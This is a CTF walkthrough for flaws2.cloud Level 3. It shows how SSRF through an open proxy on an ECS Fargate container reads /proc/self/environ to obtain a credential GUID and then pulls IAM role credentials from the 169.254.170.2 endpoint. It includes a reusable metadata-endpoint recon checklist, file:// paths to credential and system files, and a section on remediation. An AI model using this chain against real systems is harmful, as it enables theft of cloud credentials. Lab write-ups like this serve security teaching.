flaws2.cloud — Attacker Path — Level 3¶
Vulnerability: SSRF via an open proxy on an ECS/Fargate container → /proc/self/environ leaks the credential GUID → ECS metadata endpoint returns IAM role credentials
Level 2 Recap¶
The container image in ECR had credentials baked into its docker history — the htpasswd -b command stored the plaintext password permanently in the image layer metadata. docker history --no-trunc revealed it. The lesson: never pass secrets as command-line arguments in RUN commands inside a Dockerfile.
What Changed From Level 2 to Level 3¶
The web app running at http://container.target.flaws2.cloud/ now has a proxy endpoint — same pattern as flaws.cloud level 5. The proxy fetches any URL you pass it:
http://container.target.flaws2.cloud/proxy/http://flaws.cloud
http://container.target.flaws2.cloud/proxy/http://neverssl.com
This is SSRF again. But with a twist: this is not an EC2 instance, it's an ECS container. Different runtime = different metadata endpoint = different attack path.
Core Concepts First¶
What is ECS?¶
ECS = Elastic Container Service. AWS's managed service for running Docker containers at scale. Instead of launching an EC2 instance, installing Docker, and running containers yourself, ECS handles the orchestration — scheduling, placement, health checks, scaling, networking.
EC2 vs ECS in plain terms:
| EC2 | ECS | |
|---|---|---|
| What you manage | The whole VM (OS, patches, Docker install) | Just your container image |
| What AWS manages | Physical hardware only | Scheduling, placement, health, networking |
| Unit of work | Instance | Task (one or more containers) |
| Billing | Per instance-hour | Per vCPU/memory used by tasks |
| SSH into it? | Yes | Only if running on EC2 launch type (not Fargate) |
ECS launch types:
| Launch Type | What it means |
|---|---|
| EC2 | ECS runs your containers on EC2 instances you provision. You manage the underlying VMs |
| Fargate | AWS manages the underlying infrastructure entirely. You specify CPU/memory, AWS handles the rest. No VMs to manage, no SSH |
This level runs on Fargate — the AWS_EXECUTION_ENV=AWS_ECS_FARGATE env var confirms it.
ECS Architecture — Key Terms¶
| Term | What it is |
|---|---|
| Cluster | A logical grouping of tasks/services |
| Task Definition | The blueprint for a container — image, CPU, memory, environment variables, IAM role |
| Task | A running instance of a task definition — one or more containers running together |
| Service | Keeps a specified number of tasks running continuously (like a daemon) |
| Task IAM Role | The IAM role the container assumes to make AWS API calls — same concept as Lambda's execution role |
Why Are the Metadata Endpoints Different?¶
EC2 metadata: 169.254.169.254
ECS/Fargate credentials: 169.254.170.2
They're different because they're different services implemented by different teams at AWS. The EC2 metadata service is a baked-in feature of the EC2 hypervisor — every virtual machine gets it for free. ECS containers don't have a hypervisor in the same way (especially on Fargate), so AWS built a separate credential proxy service that runs alongside ECS tasks.
169.254.170.2 is the IP of the ECS Task Metadata Endpoint — a local HTTP service AWS runs inside the container's network namespace. It's only reachable from within the task itself, just like 169.254.169.254 is only reachable from within an EC2 instance.
Full metadata endpoint comparison:
| Platform | Credential endpoint | Auth required |
|---|---|---|
| EC2 (IMDSv1) | 169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME |
None |
| EC2 (IMDSv2) | Same IP, but requires PUT token first | Yes (session token) |
| ECS / Fargate | 169.254.170.2/v2/credentials/GUID |
None (but you need the GUID) |
| GCP | 169.254.169.254/computeMetadata/v1/ |
Metadata-Flavor: Google header required |
| Azure | 169.254.169.254/metadata/instance |
Metadata: true header required |
The SSRF Recon Checklist¶
When you find SSRF, try in this order:
1. EC2: http://169.254.169.254/latest/meta-data/
→ If it returns instance info, you're on EC2
2. ECS: http://169.254.170.2/v2/credentials
→ If EC2 returns nothing/times out, try this
→ Need to get the GUID from AWS_CONTAINER_CREDENTIALS_RELATIVE_URI first
3. ECS metadata: http://169.254.170.2/v2/metadata
→ Returns task/container info including cluster, task ARN, container names
4. GCP: http://metadata.google.internal/computeMetadata/v1/
(requires Metadata-Flavor: Google header — often not possible via simple SSRF)
5. Azure: http://169.254.169.254/metadata/instance?api-version=2021-02-01
(requires Metadata: true header)
Signal that told you this isn't EC2: Hitting http://169.254.169.254/latest/meta-data/ returned nothing (or blank). EC2 metadata always responds on that IP if it's running on EC2. No response = not EC2 = try ECS next.
Step 1 — Try EC2 Metadata (Fails)¶
http://container.target.flaws2.cloud/proxy/http://169.254.169.254/latest/meta-data/iam/security-credentials/
Returns nothing. Confirms this is not an EC2 instance.
Step 2 — Try ECS Metadata (Succeeds)¶
Returns a JSON blob:
{
"Cluster": "arn:aws:ecs:us-east-1:653711331788:cluster/level3",
"TaskARN": "arn:aws:ecs:us-east-1:653711331788:task/level3/1491c70b82a2428a9a14b1a94817b2db",
"Family": "level3",
"Revision": "3",
"DesiredStatus": "RUNNING",
"KnownStatus": "RUNNING",
"Containers": [{
"Name": "level3",
"Image": "653711331788.dkr.ecr.us-east-1.amazonaws.com/level2",
"Networks": [{"NetworkMode": "awsvpc", "IPv4Addresses": ["172.31.66.153"]}]
}],
"AvailabilityZone": "us-east-1e"
}
What this tells you:¶
| Field | Value | What it means |
|---|---|---|
Cluster |
cluster/level3 |
The ECS cluster name |
TaskARN |
task/level3/1491c70b... |
Unique ID of this running task |
Family |
level3 |
Task definition name |
Image |
653711331788.dkr.ecr.us-east-1.amazonaws.com/level2 |
The Docker image running in this container (same image from level 2) |
NetworkMode |
awsvpc |
Container has its own VPC network interface (Fargate networking mode) |
AvailabilityZone |
us-east-1e |
Which AZ the task is running in |
This is useful intelligence, but it doesn't give you credentials. For credentials on ECS/Fargate you need the credential endpoint at 169.254.170.2/v2/credentials/GUID.
Step 3 — Getting the GUID¶
The ECS credential endpoint isn't just 169.254.170.2/v2/credentials — it's 169.254.170.2/v2/credentials/<GUID>. The GUID is unique per task run and acts as a weak token. Without it, you get nothing.
Where is the GUID? In the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI. This variable is automatically injected by AWS into every ECS/Fargate container — it contains the relative path to the credential endpoint including the GUID:
How to get it: Via the proxy, fetch the Linux /proc/self/environ file.
Step 4 — Read Environment Variables via /proc/self/environ¶
What is /proc?¶
/proc is a virtual filesystem in Linux — it doesn't exist on disk. It's generated on-the-fly by the kernel and exposes real-time information about running processes, hardware, and system state.
| Path | What it contains |
|---|---|
/proc/self/ |
Info about the current process (the one reading it) |
/proc/self/environ |
All environment variables for the current process, null-byte separated |
/proc/self/cmdline |
The command that started the process |
/proc/self/maps |
Memory map — what code/libraries are loaded |
/proc/self/fd/ |
Open file descriptors |
/proc/<PID>/ |
Same info but for any process by PID |
/proc/self/environ is particularly valuable in pentesting because it contains every environment variable the process was started with — which in cloud environments includes credentials, connection strings, API keys, and in this case the credential GUID.
What is file://?¶
file:// is a URI scheme — like http:// or https://, but for local filesystem paths.
file:///proc/self/environ
↑
Three slashes: scheme + empty host + absolute path
= file:// + (empty hostname) + /proc/self/environ
When the proxy fetches a file:// URL, it reads from the local filesystem of the server, not from the network. This only works if the proxy implementation doesn't restrict URI schemes. Many naive proxy implementations only filter by IP address but forget to block file:// entirely — which lets you read arbitrary files on the server.
What file:// can expose beyond env vars:
file:///etc/passwd # user accounts
file:///etc/hosts # internal hostnames
file:///root/.aws/credentials # AWS credentials file
file:///app/config.py # application source code
file:///proc/self/cmdline # command that started the process
file:///proc/1/environ # env vars of PID 1 (init process)
The Output¶
The env vars come back null-byte separated (each variable separated by \0). Broken out:
HOSTNAME=ip-172-31-66-153.ec2.internal
HOME=/root
AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/adadba83-b9a3-4254-821e-165328963392
AWS_EXECUTION_ENV=AWS_ECS_FARGATE
ECS_AGENT_URI=http://169.254.170.2/api/1491c70b82a2428a9a14b1a94817b2db-3779599274
AWS_DEFAULT_REGION=us-east-1
ECS_CONTAINER_METADATA_URI_V4=http://169.254.170.2/v4/1491c70b82a2428a9a14b1a94817b2db-3779599274
ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/1491c70b82a2428a9a14b1a94817b2db-3779599274
AWS_REGION=us-east-1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Key vars explained:¶
| Variable | Value | What it tells you |
|---|---|---|
AWS_CONTAINER_CREDENTIALS_RELATIVE_URI |
/v2/credentials/adadba83-... |
The GUID path you need to get credentials |
AWS_EXECUTION_ENV |
AWS_ECS_FARGATE |
Confirms this is Fargate, not ECS on EC2 |
ECS_AGENT_URI |
http://169.254.170.2/api/... |
ECS agent API endpoint for this specific container |
ECS_CONTAINER_METADATA_URI_V4 |
http://169.254.170.2/v4/... |
v4 metadata endpoint (newer, more detailed) |
ECS_CONTAINER_METADATA_URI |
http://169.254.170.2/v3/... |
v3 metadata endpoint |
HOSTNAME |
ip-172-31-66-153.ec2.internal |
Container's internal hostname (still ec2.internal even on Fargate) |
The GUID is: adadba83-b9a3-4254-821e-165328963392
Step 5 — Get the Credentials¶
http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/adadba83-b9a3-4254-821e-165328963392
Why the GUID matters:¶
The GUID is the only protection on this endpoint. The IP 169.254.170.2 isn't routeable from outside, so in normal operation only the container itself can reach it. But with SSRF, you can reach it from "outside" via the server. The GUID adds a layer of obscurity — without knowing it, you can't just brute-force /v2/credentials because the GUID has 2^122 possible values.
It's not cryptographic authentication — it's a secret path. Think of it as a password that's only stored in the environment, with the assumption that only the container can read its own env vars. SSRF breaks that assumption when combined with /proc/self/environ.
Returns:
{
"RoleArn": "arn:aws:iam::653711331788:role/level3",
"AccessKeyId": "<REDACTED_ACCESS_KEY_ID>",
"SecretAccessKey": "<REDACTED_SECRET_KEY>",
"Token": "<REDACTED_SESSION_TOKEN>",
"Expiration": "..."
}
Same pattern as the EC2 metadata credentials from flaws.cloud level 5 — temporary credentials (ASIA... prefix), require a session token, expire after a few hours.
Step 6 — Configure and Use¶
aws configure --profile flaws2-level3
# AccessKeyId: <from above>
# SecretAccessKey: <from above>
# region: us-east-1
aws configure set aws_session_token <token> --profile flaws2-level3
aws sts get-caller-identity --profile flaws2-level3
Then enumerate what this role can access — the task's IAM role determines what you can do with these credentials.
The Full Attack Chain¶
Open proxy at /proxy/<url>
↓
Try EC2 metadata: http://169.254.169.254/latest/meta-data/
→ No response = not EC2
↓
Try ECS metadata: http://169.254.170.2/v2/metadata
→ Returns task info, confirms ECS/Fargate
→ But no credentials here
↓
Need the GUID from AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
↓
Fetch env vars via: file:///proc/self/environ
→ Proxy fetches local filesystem file
→ env vars include AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/adadba83-...
↓
Use GUID to hit credential endpoint:
http://169.254.170.2/v2/credentials/adadba83-b9a3-4254-821e-165328963392
→ Returns AccessKeyId + SecretAccessKey + Token
↓
aws configure --profile flaws2-level3 + set session token
↓
Enumerate what the task's IAM role can access
EC2 vs ECS vs Fargate Credential Flow Comparison¶
| Aspect | EC2 | ECS on EC2 | ECS Fargate |
|---|---|---|---|
| Credential source | 169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME |
169.254.170.2/v2/credentials/GUID |
169.254.170.2/v2/credentials/GUID |
| How to find role name | Hit metadata, it returns the role name | Need GUID from env var | Need GUID from env var |
| How to get GUID | N/A | AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var |
AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var |
| How to read env vars | /proc/self/environ or EC2 user-data |
/proc/self/environ |
/proc/self/environ |
| SSH access | Yes | Yes (into the EC2 host) | No — no underlying VM |
| IMDSv2 protection | Yes (PUT token required) | Partially (EC2 metadata) | Different endpoint, different protection |
Vulnerability Summary¶
The flaws (three compounding issues):
-
Open proxy with no URI scheme validation: The proxy accepts
file://URIs, not justhttp://. A properly secured proxy would whitelist URI schemes (httpandhttpsonly) and reject anything else. -
/proc/self/environreadable viafile://: Linux makes process environment variables readable via the virtual filesystem. This is normal and expected behaviour — but it becomes a vulnerability when combined with an open proxy that acceptsfile://URIs. -
ECS credential endpoint reachable via SSRF: The
169.254.170.2endpoint is designed to be internal-only. With SSRF, the proxy fetches it from within the container's network, bypassing the network isolation.
Why this is more complex than level 5 (flaws.cloud):
- Level 5: EC2 metadata at 169.254.169.254 — no GUID needed, direct path
- Level 3 here: ECS at 169.254.170.2 — need the GUID, which requires a second SSRF step via file:///proc/self/environ
It's the same core vulnerability (SSRF) but requires chaining two requests instead of one.
The fix:
- Validate URI schemes in any proxy — whitelist http and https only, reject file://, ftp://, gopher://, etc.
- Block requests to link-local ranges (169.254.0.0/16) and private ranges (10.x, 172.16.x, 192.168.x) at the proxy level
- For ECS: consider using IMDSv2-style protection for the credentials endpoint (AWS has added this in newer ECS agent versions)
- Scope task IAM roles to minimum necessary permissions — if credentials are stolen, limit the blast radius
- The file:// SSRF + /proc/self/environ pattern is a well-known attack chain — it should be in every proxy's block list
The broader lesson: SSRF vulnerabilities rarely stop at a single request. The real damage comes from chaining: SSRF to read env vars, env vars to find a GUID, GUID to get credentials, credentials to access cloud resources. Each step expands what's possible. When you find SSRF, always chase the chain.